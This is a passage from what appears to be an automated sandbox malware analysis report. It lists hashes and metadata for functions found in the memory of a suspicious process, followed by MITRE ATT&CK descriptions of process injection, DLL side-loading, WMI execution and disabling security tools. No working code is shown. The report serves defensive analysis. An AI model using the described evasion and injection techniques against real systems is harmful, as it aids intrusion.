Opcode ID: a720e32547c41510851eb0d088e4c1bf6a9c45776b021a1d0fc1d7d49537e1d2
Instruction ID: 5a140d5793adfb7714e91ad86069ca2964c39708f4f224a0277646202c73f69c
Opcode Fuzzy Hash: a720e32547c41510851eb0d088e4c1bf6a9c45776b021a1d0fc1d7d49537e1d2
Instruction Fuzzy Hash: 23F10B71B002159FCB04CF6CD98899DBBF6FF8A311B168469E916AB362DB35EC41CB50

Function 04D41084 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b65cea70ef6816e5650164fdc9bbcd7525ec345279b68abd30d43767f7fce0da
Instruction ID: 06e38e89eae5c640f0500f804b8f6a40298bdc98a3501313e52d287f0a8a00f4
Opcode Fuzzy Hash: b65cea70ef6816e5650164fdc9bbcd7525ec345279b68abd30d43767f7fce0da
Instruction Fuzzy Hash: 5C510575710100CFC716DF38DA95A1A77A6FBD8314B24C5AAE846DB3A4EB70ED02CB90

Function 04D41071 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f312c9052922b8e0170ae662ba196a15a1a6d583f6d9f2a364e7c35fd3b1d98d
Instruction ID: 5b389489f91c5aeae9a86e8aef626382410fcf63fd6ad4ed518868e93f901b29
Opcode Fuzzy Hash: f312c9052922b8e0170ae662ba196a15a1a6d583f6d9f2a364e7c35fd3b1d98d
Instruction Fuzzy Hash: 5151F475710500CFC716DF38DA94A1A77A6BBD8304B24C5AAE846DB3A4E670ED06CB90

Function 04D41B50 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 156b4d7b14630f96e32db44d5434dab93a409dd57e2307a83bc73d780c642136
Instruction ID: 01f95e0b30af912e302a3b77d36193947a165220b9dd14af417c9eb5b07e7dde
Opcode Fuzzy Hash: 156b4d7b14630f96e32db44d5434dab93a409dd57e2307a83bc73d780c642136
Instruction Fuzzy Hash: 2F31B23270414AAFCF029F65D858AAE7BA2FB89301F048425FD1687384DB78DDA1DBD1

Function 04D41AED Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5aff2002a68f020055b8b1f2c2ab69201202801a2e7f5ae75c42bbd5d6cca73b
Instruction ID: ae0feb888f37bd99f2eb5fc27bc330215d6481b1c02320fd24f984ca2b7d64f2
Opcode Fuzzy Hash: 5aff2002a68f020055b8b1f2c2ab69201202801a2e7f5ae75c42bbd5d6cca73b
Instruction Fuzzy Hash: 93316972A093908FD7135F38D8642993F60EF93304F0540DBD8858B297E638DD89C791

Function 04D44AEF Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87d3f4d147ece3136191d31f8c9bfd4138e237073c11004df8915af54a75bd42
Instruction ID: 668366fbb7c010c71c6df42ce785121c5f3e9247bd61b485a9102fa2ffa51137
Opcode Fuzzy Hash: 87d3f4d147ece3136191d31f8c9bfd4138e237073c11004df8915af54a75bd42
Instruction Fuzzy Hash: F42121313042014BDB1A1B25DDA473E36A7BFC4719F1488B9D84ACB394EE69DCC2D781

Function 04D45D90 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4f4776efca151bb0262ce2654aa2d4674f84343fd7b8b6edc20dca450683980
Instruction ID: 9093118533621c4dd9f3e6a0ff88661232fcef2096790a69bd75a5c66547a626
Opcode Fuzzy Hash: e4f4776efca151bb0262ce2654aa2d4674f84343fd7b8b6edc20dca450683980
Instruction Fuzzy Hash: AC316F71E001059FCB04CF68D8989AEBBF2BFC9310B158969E915AB3A1DB34AD51CB90

Function 04D40006 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ad2462e14ecff2c2883f765df3aff9583f0db83299b4f8b93c3435f87a9e335
Instruction ID: 30ccfdbab456ffbc552f7bbc99c5ce333ca23499d6f59a8637bb11d5ffa15193
Opcode Fuzzy Hash: 6ad2462e14ecff2c2883f765df3aff9583f0db83299b4f8b93c3435f87a9e335
Instruction Fuzzy Hash: A52121357142808FCB429FB8D8616597FF2EF8A210B1A84EAE142CF3A6DA35DC098745

Function 00ADD400 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3278365333.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_add000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fffc6f5abcca516d44e396607403581ed576c1edcdb505712c513eb9905207af
Instruction ID: f42f194ce307dd03d11516159cff79bdf3a0727ba8bd827a57ce409500fd3e47
Opcode Fuzzy Hash: fffc6f5abcca516d44e396607403581ed576c1edcdb505712c513eb9905207af
Instruction Fuzzy Hash: 8C2100B1504204DFCB15DF14DAC4B27BF65FB98324F20C5AAE90A0A356C33AE856CAA1

Function 04D49477 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e27871e3f41d6b831650ed2e389178ded0f85211819d7ab9aaf2d6bfedbf19a5
Instruction ID: fdc78664fcfa14aa6b49d8c8f885c1ff91624f4d82333847053a56d63122c188
Opcode Fuzzy Hash: e27871e3f41d6b831650ed2e389178ded0f85211819d7ab9aaf2d6bfedbf19a5
Instruction Fuzzy Hash: 2221C135B101048FCB44DB79D5A5A5EBBF3EFCD210F2480AAE10ADB3A5DA31ED018B51

Function 04D40040 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0678288474feeef2ff00a6a12f3dda6880a93230224a7dd1cdeb946acbba6345
Instruction ID: 5d6e169f3840253d7f9555110d2654338a664ae62eaca942a0a8c0dbc009a8ec
Opcode Fuzzy Hash: 0678288474feeef2ff00a6a12f3dda6880a93230224a7dd1cdeb946acbba6345
Instruction Fuzzy Hash: C81122367100049FCB44EF78C95495EB7F6EFCD210B2140AAE106DB3A5DE31EC018781

Function 04D41B40 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d38ded9306bab27d0bbd30950936c29c70ab55d37a446fb0575b8038e24df29
Instruction ID: 58e7912b29e62b5f2f31ebf68508966b610f827fd1939c8e804bb270d16d4917
Opcode Fuzzy Hash: 2d38ded9306bab27d0bbd30950936c29c70ab55d37a446fb0575b8038e24df29
Instruction Fuzzy Hash: 3C2102323052468FCB02AF24D41876E7BA2FB86311F04806AF956CB385DB78DD95CBD1

Function 04D41500 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c3d33c055ff46137509e5521d872502e746cd40ca5eadc15885b64788b8b525
Instruction ID: 3bc32fb41161d969c1ca67bc9da600926bd9f8f75d0446ecedef2c892e604052
Opcode Fuzzy Hash: 2c3d33c055ff46137509e5521d872502e746cd40ca5eadc15885b64788b8b525
Instruction Fuzzy Hash: AC21C475A012198FDB04DF94C9849DDFBF6FF88310F1486A5E809AB344EB74AD85CB90

Function 04D495C8 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b4090c04c96334ac9724d1ba88b94c2ad213e2fd1c7428b768f7bb3641addd2
Instruction ID: 533f28570ee7594ea241c93b67f30101de65361c8dae7dfdffaf1c9d59ac14d9
Opcode Fuzzy Hash: 0b4090c04c96334ac9724d1ba88b94c2ad213e2fd1c7428b768f7bb3641addd2
Instruction Fuzzy Hash: A511A370B002058BCB989F7BA92467B7AA6BBC4760F148569E506D7340EA30ED4087D0

Function 00ADD3FB Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3278365333.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_add000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 656c273b6fea14ddbfa68bb371e0c571f751dc27c7a0454d68914c28ff464cba
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: E511B1B6504244CFCB16CF10D9C4B16BF71FB94324F24C5AADC090B656C33AE85ACBA1

Function 04D42388 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a87510db79997e0cd9232a2a5861450b7e0c2fdfd1dc147232590cabba9bca68
Instruction ID: 01385e5cb9c742892b720f27690f145c05e741a6a4af69bb420446094467259c
Opcode Fuzzy Hash: a87510db79997e0cd9232a2a5861450b7e0c2fdfd1dc147232590cabba9bca68
Instruction Fuzzy Hash: AB014732700119AFDF15DE689814AAF3BE7EBC8390F04846EFA15D7240DA75DC029B91

Function 04D495B8 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfec8951efc480a74cdf4213dad5917af4b332a3a4a20b6c5e5f51b61a57bf3c
Instruction ID: b74980b8b500d30cd243458f46c55df99510fb163911dd7c68e73f3a08c9bdea
Opcode Fuzzy Hash: dfec8951efc480a74cdf4213dad5917af4b332a3a4a20b6c5e5f51b61a57bf3c
Instruction Fuzzy Hash: 400126B2E042149FCB50EF799C146AF7FB1FBA4700F0585AAE884EB311E7719906CB90

Function 04D40C60 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c82613ba4ca2baa7201fc403831097b37b441e72f68dafcfeeb7b03f5b4d3c79
Instruction ID: 0bdd5a60b11e88618b01262b19fa0e03556ecf105e86ecee6302ad670dd27b09
Opcode Fuzzy Hash: c82613ba4ca2baa7201fc403831097b37b441e72f68dafcfeeb7b03f5b4d3c79
Instruction Fuzzy Hash: C511EEB5800349CFDB20DF9AD588BDEBBF4EB48324F20845AD559A7350C379A984CFA5

Function 04D40C58 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0500370b068fda6db1ce388cf605dd05b20abd06b12e03cf2fd4d15b4e40da51
Instruction ID: 1905940369c91c33914189c72c812d92a9743d6f9f542ca510aefcca84472621
Opcode Fuzzy Hash: 0500370b068fda6db1ce388cf605dd05b20abd06b12e03cf2fd4d15b4e40da51
Instruction Fuzzy Hash: 54111EB5800349CFDB11DF99D1847DEFBF0BB48324F20845AC559A7250C338A984CFA5

Function 04D46538 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47eeb09caccc2d1ae8d7b748c1832f8d6ae7fb28718ca5a5f84e304500038d29
Instruction ID: a99ab7128926161782a42322ad68454018140460b9cd9ca6530c7a9959362c10
Opcode Fuzzy Hash: 47eeb09caccc2d1ae8d7b748c1832f8d6ae7fb28718ca5a5f84e304500038d29
Instruction Fuzzy Hash: E5F02831E0A2948FCF41DFB8540855EFFF1D3CA210B5442A7C44BCB606DA34C8148B81

Function 04D49592 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfae9d02cf1a8ae602f36417d86c514e385eb6a5b9ff70675aba0934c791374b
Instruction ID: 81180fd9a27af84e64867f6851ca2e119d682e754ce1fb13b69d9d07860775c0
Opcode Fuzzy Hash: bfae9d02cf1a8ae602f36417d86c514e385eb6a5b9ff70675aba0934c791374b
Instruction Fuzzy Hash: 47F0E5F2B082029FDB856B73AD241A72A53BBF1391F0A44A2D541D7261FA61E9064360

Function 04D410FC Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9811221c8214ebbb8633eb981968c83918a6c256220496b1b646a4ccf14946a1
Instruction ID: f73cb45ec4de977f46311b13032f7be1b759d896255c7f5fe29aa8ce5bb51269
Opcode Fuzzy Hash: 9811221c8214ebbb8633eb981968c83918a6c256220496b1b646a4ccf14946a1
Instruction Fuzzy Hash: 3EF08C343406009FD324EF79D998F1677A6EB89720F218AA4B6169F3E5CB70EC018750

Function 04D464C8 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1499814ed212e2c13bc7dbee95ddc108bb4adcd7c7933694aba7527cba7aff8a
Instruction ID: b11a1ed10f2d0f67eeeb2fe837191448c57161b309ec70a991692809e4ca5a0d
Opcode Fuzzy Hash: 1499814ed212e2c13bc7dbee95ddc108bb4adcd7c7933694aba7527cba7aff8a
Instruction Fuzzy Hash: EDF0553670A2E04BCB094A7C181445A7FE6C3C725070184ABD48BCB66ACC14CC158384

Function 04D40900 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db5397f1812d8387d2cdf87a5ab81a31a0a7e25c7f7ad8ad584ad63720a61e3b
Instruction ID: fac17e78927b0a2999faaa07bd29ceb6ac81ced6b74f48705fde6b38ec62a526
Opcode Fuzzy Hash: db5397f1812d8387d2cdf87a5ab81a31a0a7e25c7f7ad8ad584ad63720a61e3b
Instruction Fuzzy Hash: BEE0223220D3E40FE3039AB8192156B2F368BC7200B0D45EBD68ACF263C110C8258382

Function 04D464D8 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b93e4c65aa74ae3b5d612346879803f4007e5b2ecdb2fad6f094b679f37175
Instruction ID: f7adef8a399ff304f3d337131861675ea1c7dc1676269e55b17ddc2be34a76ff
Opcode Fuzzy Hash: c9b93e4c65aa74ae3b5d612346879803f4007e5b2ecdb2fad6f094b679f37175
Instruction Fuzzy Hash: 7DE02C32B0412883CB485EBC290801AB5CFA3DA660B008823A50BC7B0CDE64DC0043D9

Function 04D47D06 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59c7cad8989a62543295c094c281444ddacd4eef0862b46d25b9f16bf71f17b9
Instruction ID: 1ccf80907a12abb733c6d658847054f85dcedeb913414fc396a989a2758b8e30
Opcode Fuzzy Hash: 59c7cad8989a62543295c094c281444ddacd4eef0862b46d25b9f16bf71f17b9
Instruction Fuzzy Hash: 4DE0D831F10D418B8704EBA568A903672D6ABCC20075588B79406DF364DF709D035792

Function 04D40910 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e47b136fb0583396fb98afb95394bc9449c10c6409d6e38ee38030f630cd4c1a
Instruction ID: 6f1afdd0c07c9c6d179190d04bf11ab8ab6cb7c0681165d2d88a7ccd0b403b3f
Opcode Fuzzy Hash: e47b136fb0583396fb98afb95394bc9449c10c6409d6e38ee38030f630cd4c1a
Instruction Fuzzy Hash: A3D02B3231019947F1465CED5911156714ED7CA660B088463E30ACF304D550DD2142C6

Function 04D47D6C Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d3a62e69e17e1e61a93d728dd9af4756e295521f460447211a6356f6bfab48d
Instruction ID: 56b6943f734306e2be0c7059a7517f1669acc4e2ae607d41f819a2d76d90ea89
Opcode Fuzzy Hash: 3d3a62e69e17e1e61a93d728dd9af4756e295521f460447211a6356f6bfab48d
Instruction Fuzzy Hash: B7E08670F004404F8344E7A5A9A9026729AABCC20071584769406CF368DF309D034B92

Function 04D45678 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 0961f9ac5431cf13f824b866da369b0cf05c2e4dc6898cdb17aa0a672b52360a
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 09C08C3320C1283BA734204E7C80EA3BB8CD3C23F5A210137FA9CC3200A882BC8041F8

Function 04D45C95 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5649589a6ff3c47ae7332b500c500a8941334966454e04365c0b0fb02855851a
Instruction ID: 8bfdbb03ef778bec4ae11f93e2a864f349457acfa42ac137626f097d861ae16f
Opcode Fuzzy Hash: 5649589a6ff3c47ae7332b500c500a8941334966454e04365c0b0fb02855851a
Instruction Fuzzy Hash: 47D0673AB40018EFCB049F99E8408DDF7B6FB98221B148516E915A3261CA319D25DB54

Function 04D42B8B Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 607534df58534f516054ac36acf809dd277af08e7d23d33511da55c9672040d6
Instruction ID: 862852bf29f1ac9ad7f1f440a6eea70397dcf0c8fc8dbd3f1bdeb9a0674257db
Opcode Fuzzy Hash: 607534df58534f516054ac36acf809dd277af08e7d23d33511da55c9672040d6
Instruction Fuzzy Hash: C6D0C2B54087829ECF02F731A8A84157F76E982300711D9FAE0460A62BCAB888898F00

Function 04D41394 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba78ea5d6167a8de28c19aa8bf1f010968f466b7a343a1f59089a2d1630804b3
Instruction ID: f76f2bc08ab9a39b4567f4b823156d5f541e49ec26377bcab9f2e96f4e574f89
Opcode Fuzzy Hash: ba78ea5d6167a8de28c19aa8bf1f010968f466b7a343a1f59089a2d1630804b3
Instruction Fuzzy Hash: DED01774B106408FC748DFB0E9A981977E8AB88600310C4AA9806CB3B0DB749E01CB50

Function 04D42B98 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d94fe2575f2353272b1337ffdda4779d563f509c6c0ebf44542445b95385ecb
Instruction ID: 95ad58b5c4ee94e6c3d81f324151266707be34150e4749130e4d77894ca2384e
Opcode Fuzzy Hash: 8d94fe2575f2353272b1337ffdda4779d563f509c6c0ebf44542445b95385ecb
Instruction Fuzzy Hash: 53C02274000A0A5ECE01F320F828424732FE680300700DA30A40A0631ECFB8988D0A80

Non-executed Functions

Function 04D46257 Relevance: 5.2, Strings: 4, Instructions: 171COMMON

Download Yara Rule

Strings

$^q, xrefs: 04D46366
4'^q, xrefs: 04D4645B
$^q, xrefs: 04D46372
Hbq, xrefs: 04D46412

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID: 4'^q$Hbq$$^q$$^q
API String ID: 0-3400431855
Opcode ID: 8fb2a7c793b6975a30dfb1d91dcd5943fd33c1612f6f94fa520f306ac4e1a612
Instruction ID: 2b90c71be96efa791a93a2115c931d95d06a6fd8948b39cfd81a41b0a5f5b786
Opcode Fuzzy Hash: 8fb2a7c793b6975a30dfb1d91dcd5943fd33c1612f6f94fa520f306ac4e1a612
Instruction Fuzzy Hash: E651C0307002914BDF19AB7998A853E6AA7BFC27417184869E443CB395EF3CDC0397A6

Function 04D42D68 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 04D42D74
\;^q, xrefs: 04D42D9A
\;^q, xrefs: 04D42D7E
\;^q, xrefs: 04D42DA6

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: a0ded94ab2332610b240354f28931b9279a0b79daa0fb5efacf69090d001ff7d
Instruction ID: ce6a37a121e9be8cde0612f9dae08c1abff60a0b5688e489b0a2aa01a51dd3d7
Opcode Fuzzy Hash: a0ded94ab2332610b240354f28931b9279a0b79daa0fb5efacf69090d001ff7d
Instruction Fuzzy Hash: 5E019E317104058F8B688E2DC444A2577EABFC8BA031541A9F042CB3E4DB21EC81C7D0

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
